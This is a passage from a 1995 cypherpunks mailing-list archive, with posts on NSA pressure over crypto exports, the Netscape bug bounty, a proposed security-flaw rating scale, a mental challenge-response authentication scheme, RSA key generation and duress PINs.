gosh people can get *bomb* making information on the internet, we must
put a stop to this".

How to get what you want in 4 easy stages:

1. Have a target "thing" you wish to stop, yet lack any moral, or
practical reasons for doing so?

2. Pick a fear common to lots of people, something that will evoke a
gut reaction: terrorists, pedophiles, serial killers.

3. Scream loudly to the media that "thing" is being used by
perpetrators.  (Don't worry if this is true, or common to all other
things, or less common with "thing" than with other long established
systems - payphones, paper mail, private hotel rooms, lack of bugs in
all houses etc)

4. Say that the only way to stop perpetrators is to close down
"thing", or to regulate it to death, or to have laws forcing en-mass
tapability of all private communications on "thing".  Don't worry if
communicating on "thing" is a constitutionally protected right, if you
have done a good job in choosing and publicising the horsemen in 2, no
one will notice, they will be too busy clamouring for you to save them
from the supposed evils.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 04:32:06 PDT
To: cypherpunks@toad.com
Subject: Japan-CIA
Message-ID: <199510161131.MAA04458@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Japan-CIA

   	
Tokyo (AP) -- Japan said that its relations with Washington 
could 
be seriously damaged if a report that the CIA spied on Japanese 

representatives at auto talks proves true. The New York Times 
reported Sunday that the CIA eavesdropped on conversations 
between 
Japanese negotiators and automakers during the talks in Geneva 
this 
year, reporting the results daily to U.S. Trade Representative 
Mickey Kantor. According to the report, Kantor was provided 
with 
summaries of conversations between Japanese bureaucrats and 
executives from Toyota Motor Corp. and Nissan Motor Co. Toyota 
called the alleged eavesdropping ``unthinkable,'' but refused 
to 
comment further.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 16 Oct 95 13:52:40 PDT
To: cypherpunks@toad.com
Subject: Human ID through insecure channel
Message-ID: <199510162051.NAA03429@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is an example of the Matsumoto/Imai scheme for identifying yourself
via a shared secret over an insecure channel, a system which is simple
enough to be done in your head but which can withstand repeated
observations by an adversary without being broken.

The idea is that there is a challenge and response.  In one example they
give, the challenge is:

28517364

What happens here is that there are two secrets.  The first is which
characters are special in the challenge.  In this example let us assume
that is 1,2,4,6.  The second is a secret response string of the same
length; in this case let it be 3124.  Now what you do is to enter a
response string of the same length as the challenge.  Only the characters
in the same spot as those which held special characters in the challenge
(1,2,4,6) matter, and those four should spell out the secret word 3124.
So a correct challenge and response could be:

*  *  **
28517364
34312124

I have marked the spots in the challenge which use 1,2,4 or 6, and if you
look at the response in those marked spots you have 3124.

This is not too bad, but as more realistic examples the authors suggest
much larger strings.  In the first example the alphabet of characters
would be the lower case letters and the digits 0-9, 36 characters in all.
The challenge string would also be 36 characters long.  Your secret word
would be 18 letters, but the response alphabet is only the binary digits 0
and 1.

So, suppose the special characters are befhjkmnpqtvwz1468, and the secret
word is 011010111010110101.  The secret can be memorized in hex as 1aeb5.
This is not so much to remember, but try applying it in practice.  Here
is a challenge:

5fmp67yez2rnq4wd3uthsg1i8l09bkoavjxc

To create the response, we go across, putting down random 0's and 1's,
until we recognize our special characters.  The first is f, the 2nd
letter.  So we are careful to put down 0 there since that is the first of
our secret word letters.  Then the m is special, so we put down 1; the p
and 6 are special too, so we put down 10.  Then the 7 and y are not
special so we put random characters down there, and so on.  So our
initial response might be:

0011010...

Try coming up with the rest of the response, and see if you think you
could learn to do this by memory.

Another example the authors offer uses a somewhat shorter secret word and
set of special characters, but as a tradeoff the challenge alphabet is 50
characters (upper and lower case letters, say, minus 2 of them), and the
challenge is 50 characters long.  The secret word need be only 10
letters, and the response alphabet is 3 letters, say 0, 1 and 2.  So
suppose the special characters are bruzCEHMOQ, and the secret word is
2012100211.  Here is a challenge:

tJWTEjrkiqxsfmdAelvDIPguonKzFUHXwSaNVcpBQhGybRLMOC

Coming up with the response is left as an exercise for the reader.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 16 Oct 95 10:42:27 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
Message-ID: <aca849e3050210043eb7@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



I don't know anything about uninvited visits, but I did once interview the
designer of a major product about getting an export license. He said that
the NSA were fairly thorough in their review of the product. The most
interesting thing that he mentioned was thatthe company had to guarantee
that the data would never be encrypted sequentially by two _different_
algorithms. Apparently double encryption by 40-bit RC-4 was okay, but using
different algorithms was
verboten. This seemed odd to me at the time and I asked him twice about it.
He agreed that it was weird, but they had no problem with guaranting it.

This led me to these notions:

*) Maybe double or triple DES isn't that great an idea. Maybe the NSA knows
some neat algorithms that can create group-like actions even if the
encryption process isn't a group.

*) Maybe there was a communications problem and no one knew what was being
asked.

*) Maybe the cryptanalysis boys never really talked that much to the folks
who go around regulating export. After all, denying export licenses for
small details is like telling people that certain small details can
confound analysis. This is a leak of information from the NSA which doesn't
seem to like these things.

In general, I think communications between the NSA and the companies begin
when software companies make unofficial inquiries about what is exportable.


-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Oct 95 14:40:45 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: The NSA Visits Compendium
In-Reply-To: <aca7dbbd26021004fefd@[205.199.118.202]>
Message-ID: <199510162105.OAA05055@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



re: "Men In Black Study"

I think this is a really excellent project, for the main reason that
the NSA lives and dies by a "nobody is noticing" modus operandii (relative
congressmen, the public, companies, foreign governments, etc.). it
is a sort of "security through obscurity" that can be defeated.  this
has been a topic that has long fascinated me.

I suggest however that the scope of the survey be expanded to the FBI.
there are reports the FBI visited Lotus a long time ago to ask them
to put in a "back door" into their encryption software, because it
was too strong. it seems to me this is very similar to the survey
questions. also keep in mind that the NSA loves to use "front agencies"
like NIST to do their dirty work. so it might be hard to detect an
"NSA visit".

however the NSA like all intelligence agencies is really brilliant in
intimidation. I think one would find that these situations are going
to go "unreported" because the NSA may be leaving the impression that
"not following our suggestion" is one sin, but that "screaming about
this in the public" is going to be another liability. that is the coercion
tactics that they are legendary for, IMHO. "you must do this, but we
can't tell you why. you can't ask anyone else about this, either".

I suspect that the entire crypto industry has been sabotaged in a lot
of subtle ways by the NSA doing this, and nobody is the wiser. I hope
people realize that by not reporting this, you contribute to the problem,
not the solution. as Thomas Paine said, roughly, "the power of tyranny
lies solely in the fear of rebellion".

a study on this would be very significant. (from what I understand, the NSA
tried to do this with public key crypto, i.e. suppress it at the
publication stage. a professor gave a lecture on this in one of my
classes and said that it was even covered in the NYT at the time.
unfortunately I lost the date. I believe it was a long time ago
(maybe the 80's or even the 70's). hopefully someone else has an
encyclopedic brain.

in fact, we might be able to get Levy or Markoff to write on this subject
if we can get any significant results.  that would be *hot*. they could
put a great spin on it, like "the netscape bugs are a problem, but an
even more horrifying and unimaginable thing going on is..."  if the NSA
has visited Netscape, that's virtually an article right there!!

>* Does the NSA really visit companies planning to include crypto modules
>and ask them to weaken or remove the crypto modules?

a rumor was floating around that they visited Mosaic designers.

>* What pressures are brought to bear on companies to induce them to weaken
>crypto, even for domestic-only use, or to remove hooks?

probably just the insinuation that they may be liable. you know the lovely
intimidation tactic, "what you are doing may have LIABILITY". of course
everyone does all kinds of ridiculous things, because, after all, one
might be LIABLE after doing them.

>* Is there concrete evidence of these things?

it is in the NSA's interest to cover up any evidence, and furthermore to
suggest that their program, if it exists, is totally ineffective. I think
otherwise. I think it is prime dirty secret of the NSA and a major
public relations liability that ought to be exploited to the utter,
full extent by cypherpunks.

[Blaze etc.]
> They confirmed that such a panel _does_ exist, but that it is
>fairly ineffectual. Apparently many people publish without approval.

however it may be more effective with commercial companies worried about
liability. sometimes the slightest whiff of liability sends a company
screaming for cover and not touch an entire area with a ten foot pole.
I wonder if cellular phone encryption in the US 
has been delayed for this reason.

>NSA Actions: Visits on a regular basis by two NSA representatives ("always
>two"). Pressured them to drop plans for a strong domestic crypto module.
>
>Source: Personally told to me by programmer at the company, 1995-10-14. He
>wishes the company not to be named.

unfortunately, whenever someone says, "don't name my company", it loses
effectiveness. I would like to point out that people are directly contributing
to their erosion of rights by this behavior that suggests that they
doing something lawbreaking that they are ashamed of.

well, good luck with the study. I'll do what I can to publicize it <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: William McVey - wam <wamcvey@fedex.com>
Date: Mon, 16 Oct 95 12:15:25 PDT
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Let's refocus... (was Re: Netscape rewards are an insult)
Message-ID: <199510161915.AA06148@gateway.fedex.com>
MIME-Version: 1.0
Content-Type: text/plain


Jonathan Zamick wrote:
>
>On the one hand, many people here see strengthening security and encryption
>in use as a no-holds benefit. The more that is out there, the better it is,
>and the more its in use, the better off things will be.
>
>On the other hand, Netscape is a hot stock company. Its ok to work for
>recognition, and to donate time for the betterment of the community even if
>it profits others. (Eventually such things come around, which is the
>classic value of a net reputation.) However, when sudden, large profits
>hinge on your work, it is harder to take the philosophical route.

As a (partial) solution to this problem, how about if rather than continuing
to poke holes at netscape, we start an effort to bring one of the free Web
Browsers, say Mosaic or Athena into line so it can be used instead of Netscape
to perform secure transactions.  This way our efforts are still oriented
toward better personal encryption and better transaction security, but our
work doesn't so directly benefit a for-profit company (something I have 
very little interest in doing without being employed by that company.)

Personally, I see one of the cypherpunk's main objectives is to increase the
security and privacy of people using computers and networks.  I think this
effort would further that goal.   Sure, Mosaic may not have 75% of the market
share on Web browsers, but that's probably because it is missing some basic
functionality like encryption.

 -- William




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Oct 95 14:33:53 PDT
To: williams@va.arca.com
Subject: Re: proposal: "security spectrum scale" (SSS)
In-Reply-To: <2648899582.57910054@va.arca.com>
Message-ID: <199510162132.OAA25544@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>> it seems to me what is lacking in all this is a *security spectrum*.
>> unfortunately security experts sometimes have a tendency to equate
>> *any* security weakness with a catastrophic one. while this is a good
>> approach in general, i.e. to be as conservative as possible, in 
>> practice there can be no doubt that some security weaknesses are far
>> less severe than others.
>
>Unfortunately, severity is a question of perspective.  In some
>environments, an operating system crash could be considered catastrophic.
>In others, it just means reboot and continue.  I'm not a policy wonk,
>but security is relative to what you care about.

I gave some examples in the initial message. the rating would not
be overly sophisticated, but would cover situations where it is 
pretty obvious which is more insecure than something else. for example
submitting arbitrary code is far worse than merely crashing a server.
or, messing up a client is generally less severe than
crashing a server (which potentially affects a lot more people).
being able to do something *undetected* is
much worse than being detected (during or after the fact). 
viruses are pretty much worse than stuff that can't repropagate
itself, etc.

an example of this is that one article compared netscape
buffer overflows to the Morris internet worm. this was pretty
obviously way out of line IMHO.

>The only way to unify security rankings is to constrain the problem by
>assuming an environment and intended uses for the system.  It sounds
>like you are assuming a low assurance workstation with an internet
>connection which is used for non-critical home or business purposes.

well, this would be a ranking for the general public to help them
understand security problems, so yes, I think it would generally
apply to commercial or internet type environments.

the orange book rating is a reasonable start as you mention. also,
thanks for the paper reference. actually what I am hoping is that
someone from, say, CERT picks up the idea and uses it in their
security bulletins. this would be a good place to bootstrap it
into security consciousness.

>Any flaw rating system needs to consider how it will deal with advancing
>protection technology.  For example, susceptability to viruses is much less
>critical than it would be if there were no anti-virus software available.

I disagree. this rating would apply to potential problems. a virus is
a very serious matter regardless of anti-virus protection software.
but you raise a good point in that the same bug could have different
seriousness in different environments (say one where the virus checking
is good). that's more complexity than the rating would try to address,
I would imagine.

>Similarly, having a microkernel operating system makes me less susceptable to
>crashes.  Should a flaw rating decrease as technology adapts to deal with it?

my example would be the recent netscape bug. an article might say
the bug was rated G2 on some systems, and say it could be potentially
as bad as A6 on some operating systems. "for comparison, the internet
worm was ranked A2".

>Also, how do you rate situations where flaws are combined to mount an attack?
>For example, I crack a weak password to get a guest account.  Then I snag an
>unprotected password file and crack it to get root.  Then I leave an
>undetected
>trapdoor to get back in later.

the rating would only apply to flaws. if you have more than one flaw,
a different rating would apply to each flaw. what you are showing is
that again, system configuration could make the same flaw much worse
on one system than another. I don't deny, this is a very tricky
rating scheme. it is only meant to be general however and give the
public an idea of how bad a weakness is. 

the security rating would not be particularly useful to security experts,
other than giving a rough idea of the potential severity of the problem.

again I still believe that
major security categories are being conflated to the point that it
might sound, to Joe Sixpack, that the latest netscape bug could bring
down the entire internet. this gross misperception is easily rectified.

I find this kind of alarmism very counterproductive to improving 
the internet. the internet will not gain widespread acceptance if
there is a *perception* that it is unsafe (regardless of how 
solid it really is). this rating would be an attempt to help the
public understand security issues beyond a very rocky level of
granularity. if something is not done to help convey accurate information,
a void occurs and potentially "urban myths" 
such as "the internet steals your credit cards" would tend to 
arise.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 16 Oct 95 06:36:16 PDT
To: cypherpunks@toad.com
Subject: OS$ Hackwork
Message-ID: <199510161335.OAA06856@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.oss.net/oss/

[Condensed version of ad in Wash Post 10-16-95]
   
   
Register Now For OSS '95: Fourth International Symposium
  
Global Security & Global Competitiveness: Open Sources
Solutions.  7-9 November 1995 in Washington DC

-----

[Excerpt on workshops]

Hacker Panel (will be repeated 9 Nov 95). Winn Schwartau,
Chris Goggans, Eric Hughes, Emmanuel Goldstein on
specific vulnerabilities of typical national
communications and computing infrastructures, with
specific suggestions for improving both defense and
counter-intelligence against electronic terrorists and
criminals. Invited commentary from DISA, NSA, FBI.

-----

Spys, Scholars, Hackers, Competitive Intelligence
Analysts, Law Enforcement Analysts, Private
Investigators, Journalists, and Information Brokers


Unique conference, acclaimed in the international media
and respected in professional circles. Addresses open
source intelligence (OSINT) strategy, policy, collection,
production, and hands-on specifics. Of vital interest to
all those who consider themselves experts or "knowledge
workers". OSS '95 will feature 25 world-class speakers in 
plenary session, 25 interactive interest and training 
groups, and 75 carefully-screened international exhibits.

Subject Area Themes [with TLA$ galore, gov and ex-s in biz]

7  Nov: Economic Competitiveness & Information Warfare

8  Nov: Military Operations Other Than War

9  Nov: Transnational & Domestic Law Enforcement

This year's conference includes several half-day 
pre-conference workshops on 6 November [including "two
hacker workshops"]:

1) an orientation on open source intelligence for
   first-time attendees,

2) the National Military Intelligence Association will
   conduct a workshop on "Defensive Information War
   Technology", and

3) the Operations Security Professionals Society will
   conduct sessions on open source counterintelligence
   and open source operations security measures.

----------

To register or exhibit:

Voice: (703) 242-1700 / Facsimile: (703) 242-1711
<http://www.oss.net> or <oss@oss.net>

Open Source Solutions, Inc.
International Public Information Clearinghouse
11005 Langton Arms Court, Oakton, VA 22124












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sameer Parekh <sameer@palladium.corp.sgi.com>
Date: Mon, 16 Oct 95 16:37:41 PDT
To: cypherpunks@toad.com
Subject: Cardinal Wins Okay for First Online Bank
Message-ID: <3082EA45.41C6@corp.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.yahoo.com/headlines/current/business/stories/bankonline_289001.html

-- 
Sameer Parekh
sameer@corp.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Oct 95 13:43:06 PDT
To: cypherpunks@toad.com
Subject: Digital Cash The Book
Message-ID: <199510162041.QAA15620@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The eagerly awaited "Digital Cash" (with disk) by Peter Wayner 
is available says the publisher:


APProfessional, 1-800-3131-APP.


$34.95.


Don't know if the author offers the special treatment for this 
that he offers for the excellent "Agents Unleashed."


See his musical homepage at 
<http://access.digex.net/~pcw/pcwpage.html>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:21:11 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510152232.SAA12387@book.hks.net>
Message-ID: <3082EDD2.20C9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


David A Wagner wrote:
> I do think their ``bug bounty'' system is an improvement -- at least
> they're showing some concern for security, and beginning to admit
> that outside review of security-critical code is...well...critical.

  The whole bug bounty thing is an experiment.  We have no idea how
valuable it will be, but we thought it would be worth trying.  As we
gain more experience with it, we will probably evolve it.

> Still, I do agree that they really oughta be employing true experts
> to carefully evaluate their system, if they wanna claim anything about
> its security.

  We are doing that to.  We are paying outside consultants to review
everything related to security.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an402976@anon.penet.fi (RingZero)
Date: Mon, 16 Oct 95 10:27:51 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <9510161711.AA16223@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain





======
On Sat, 14 Oct 1995, Henry Wertz wrote:

On Sat, 14 Oct 1995, Dr. Frederick B. Cohen wrote:

> 	The idea that Netscape (like Microsoft) thinks they can get free
> testing services from all over the net by real experts just by offerring
> a tee shirt is down right offensive.
>
> 	I have a better idea.  How about an open market in break-in
> software.  We crack Netscape and offer the crack code to the highest
> bidder.  Bids start at US$25K per hole.  For the insult, Netscape has to
> outbid the competition by a factor of 2 to get the details of the hole.
> Here's how it works:
*cut*
     You know, this all seems kind of greedy to me.. It used to be people
would find holes for *fun* and not for profit.  It's still possible to do
that you know 8-).
======

It almost sounds like extortion, doesn't it?

RingZero


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: williams@va.arca.com (Jeff Williams)
Date: Mon, 16 Oct 95 11:58:16 PDT
To: vznuri@netcom.com
Subject: Re: proposal: "security spectrum scale" (SSS)
Message-ID: <2648899582.57910054@va.arca.com>
MIME-Version: 1.0
Content-Type: text/plain


Vlad Nuri writes:

> it seems to me what is lacking in all this is a *security spectrum*.
> unfortunately security experts sometimes have a tendency to equate
> *any* security weakness with a catastrophic one. while this is a good
> approach in general, i.e. to be as conservative as possible, in 
> practice there can be no doubt that some security weaknesses are far
> less severe than others.

Unfortunately, severity is a question of perspective.  In some
environments, an operating system crash could be considered catastrophic.
In others, it just means reboot and continue.  I'm not a policy wonk,
but security is relative to what you care about.

> to aid this serious problem, I propose the creation of a 
> UNIFIED SECURITY SPECTRUM RANKING.

There already was a USSR, but I think it ultimately failed :-}

For some starters, you should check out:

   A Taxonomy of Computer Program Security Flaws
   Landwehr, C.E., Bull, A.R., McDermott, J.P., and Choi, W.S.
   ACM Computing Surveys, Volume 26 Number 3, September 1994

Which organizes flaws according to how they enter a system, when
during the lifecycle they enter, and where in the system they
manifest themselves.  Some additional papers are available at the
NRL web site.

> this would be a list of all the different types of security weaknesses
> a system can have, and their LEVEL OF SEVERITY. it would attempt to 
> rank every type of security breach possible. then, when a new
> security weakness is discovered, it could be ranked A1 or B5 or C6
> or whatever. this would be a sort of technological "richter scale"
> that would allow the novice to immediately understand that a given
> bug that was recently discovered (say, the recent netscape bugs)
> was, say, not really as potentially severe as the Morris worm.

To whom?

The only way to unify security rankings is to constrain the problem by
assuming an environment and intended uses for the system.  It sounds
like you are assuming a low assurance workstation with an internet
connection which is used for non-critical home or business purposes.

Ironically, the digraphs you propose look sort of like Orange Book
ratings.  Evaluation results, however, tell you something (not everything
by a long shot) about how trustworthy a product is.  Your rating seems
to indicate the exact opposite.  How about a B2 product with a G3 flaw?

I believe that that flaw rating is *exactly* the same problem as product
security rating.  But that's a different discussion.

> however, if we do this, I hope that a good scale that is pretty general
> and doesn't need extensions can be done from the start, before its
widespread
> usage, so that later changes do not confuse users. there is already 
> confusion in the media about two slightly different richter scales, this
> is a pity.

Any flaw rating system needs to consider how it will deal with advancing
protection technology.  For example, susceptability to viruses is much less
critical than it would be if there were no anti-virus software available.
Similarly, having a microkernel operating system makes me less susceptable to
crashes.  Should a flaw rating decrease as technology adapts to deal with it?

Also, how do you rate situations where flaws are combined to mount an attack?
For example, I crack a weak password to get a guest account.  Then I snag an
unprotected password file and crack it to get root.  Then I leave an
undetected
trapdoor to get back in later.

--Jeff Williams  <mailto:williams@arca.com>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 17:51:11 PDT
To: cypherpunks@toad.com
Subject: Re: Bug Bounty [noise]
In-Reply-To: <199510160542.WAA09463@desiree.teleport.com>
Message-ID: <3082FD0C.7103@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen wrote:
> 
> Something I noticed about the Netscape Bug Bounty that seems to not have
> been mentioned here...
> 
>         "Linux users need not apply."

  If a linux user finds a security hole that is reproducible in
any supported version then they are still eligible for the prizes.
If a linux user finds a security hole that only applies to linux,
I don't know what the company would do, but I would push for them
being payed as well.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 16 Oct 95 18:03:05 PDT
To: cypherpunks@toad.com
Subject: Using deterministic programs to select private RSA keys.
Message-ID: <aca8b0fa01021004bc41@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Much has been said recently here about how to produce truly random primes.
Suppose you are selecting a secret key to be used by a bank to sign its
documents. Short of examining the code very closely, or writing your own,
you are vulnerable to a program that selects primes from a vastly reduced
set. If this program behavior is known then discovering the secret primes
may be vastly easier. Writing your own code, or examining other's code, is
error-prone and requires trusting someone who knows more math than most
programmers. Here is an alternative that requires only simple high school
math to understand.

I define a simple protocol and commission several independent programmers
to implement it. The protocol is to accept a sequence of key strokes for
printable ASCII characters. Whitespace is ignored except that two
successive newlines terminate the input. MD5 is applied to the input stream
and the result is used to start the search for the prime.

The required entropy must come from the keyboard. Each of these programs
are used with the same input and the yields are compared. It is even better
if the programs are bought on the open market. The more divers the
interests of the programmers, the less likely there can be an undetected
conspiracy.

The naive objection to this is that the keyboard input will be less than
perfectly random. That is certainly true. The input need not be random--it
is only necessary that there be sufficient entropy. There is a real hazard
that the user does not understand the issues and will merely type in the
first paragraph of the Gettysburg address, having heard that there is about
one bit of entropy per character in the English language.

If several bank officers trust each other but not the other's grasp of
entropy they can each enter text since the accumulated entropy only
increases. (They need not hide the text from each other.)

MD5 only produces 128 bits. It might be wise to require more than 128 bits
of entropy. The scheme as described can only ever produce 2^128 distinct
primes. That is small compared with the number of 1K primes. But having to
test 2^128 primes seems hard enough. Are there other attacks?

You might argue that trusting a program to choose secret keys is no worse
than trusting your operational signing software. True. You can confine that
operational software and compare the yields of programs by different
programmers. (The software of the Space Shuttle uses such redundancy.) The
confinement program must supply any required random salt or padding.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 16 Oct 95 16:58:07 PDT
To: Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
Subject: Re: mental cryptography
In-Reply-To: <199510141243.IAA27588@hammond.cis.ohio-state.edu>
Message-ID: <199510162357.RAA28204@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Nathan Loofbourrow <loofbour@cis.ohio-state.edu>
> 
> Of course, perhaps this encourages someone to steal your card and
> incapacitate you before you can report it. That's why we have
> PINs... so that someone can steal your card, threaten you until you
> reveal your PIN, and then incapacitate you... Hmm...
> 
> Even with a weak PIN system for authentication, you can always provide
> a "duress" PIN, right?


I can think of two purposes for "duress codes":  1.   To yield 
little loot to the thief, thus leaving more of it in your possession
and discouraging theft.  2.  To summon help in the form of physical
force.


The first use is susceptible to the "give me more or I cut off your
little finger" approach.  So we are again faced with the great
importance of a good police force.


Let us not forget about the value of such when constructing our future
visions.


Bryce
signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMILxb/WZSllhfG25AQFiSwP/YgjCyQG/VfMKg8ervnnirEYxaqTdcTXW
AuDmDhVMrtP0J5kr1/7bZVDTY8wNrkptzBM9K8P9TFyhxEZnJZWEfW8PXR2Q28cC
nlUgF5PlWBqlPgnA6mZPbGQD8Fef+en4s1Rh1/9OxTxS3kFy1a3gMdkiR5iSKTVR
S9gGz3HBHNg=
=CmKt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:22:10 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151619.MAA25730@pipe4.nyc.pipeline.com>
Message-ID: <30830332.7BC8@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
> 
> Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne")
> on Sun, 15 Oct 12:0  AM
> 
> The PR of Bugs Bounty is the aim, as the quick-market-adapter
> Netscape Chair speechified in FR.
> 
> Promoting the notion that hackers are earnestly attacking
> Netscape and reporting its bugs increases its credibility to
> the stock market porkers. Is that not why dear
> all-too-attentive Jeff has been assigned duty on this list,
> feeding peanuts to chimp hackers and champ newshacks?

  I have not been "assigned duty" on this list.  I'm here of my
own free will.  I want to keep up on whats going on in the
cypherpunk world, and sometimes tap the expertise of the list.
I'm not some corporate flack assigned here to "feed the chimps".
My personal feelings definitely lean toward unimpeded strong
crypto, personal privacy, freedom from govt. surveilence, etc.,
and I was interested in this stuff at a personal level before
joining netscape, or working on security stuff.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hittinger <bugs@ritz.mordor.com>
Date: Mon, 16 Oct 95 15:16:44 PDT
To: cypherpunks@toad.com
Subject: NSA crypto museum article
Message-ID: <199510162216.SAA10517@ritz.mordor.com>
MIME-Version: 1.0
Content-Type: text



The November 1995 issue of 'Popular Communications' magazine has a nice article
on the NSA Cryptologic Museum.  Included are maps and pictures and stuff.

Don Schimmel wrote the article.

I'm relocating to Herndon at the end of the month so I'll have a chance to
run by there.

Regards,

Mark Hittinger
Internet Manager
WinNET Communications, Inc.
bugs@win.net  bugs@ritz.mordor.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 16 Oct 95 20:21:41 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510152256.SAA02632@pipe4.nyc.pipeline.com>
Message-ID: <308304EA.28AF@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


John Young wrote:
>    That's the joy and sorrow of this reading list, the ancient
>    story, talented people working their asses off for sons of
>    bitches who think employees are contemptible, disposable or
>    bribeable for cheap change and backpats -- and easily
>    replaceable on shore or off. Jeff's not alone in this bind.

  I don't share your cynical view of the world.  Having worked for
a year at IBM, I know what that side is like.  I feel pretty strongly
that all employees should have ownership and a vested interest in
the company.  At the last three companies I've worked for, every
employee has had stock options.  I think that companies exist
where management holds the view that you mention, but there are
also companies that value the contributions of their employees.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Mon, 16 Oct 95 15:28:18 PDT
To: perry@alpha.jpunix.com
Subject: Re: Weekly MixMaster list
Message-ID: <9510162227.AA28775@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain



What is the MixMaster list, and what is it for?
Apologies on my newbie status.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________



re reported. You don't need a strong authentication technique
>if a stolen card is easy to cancel.

The card's easy to cancel, but the cash ain't.  Credit cards are
cleared with the issuer.  Digital cash with smart cards acting as
transaction observers don't need this.  The thief need only transfer
the cash from the stolen card to his own, just like he does with
regular cash.

>Even with a weak PIN system for authentication, you can always provide
>a "duress" PIN, right?

Sounds like a better choice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Mon, 16 Oct 95 01:37:42 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape question transformed
Message-ID: <199510160837.SAA05368@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Alice de 'nonymous wrote..

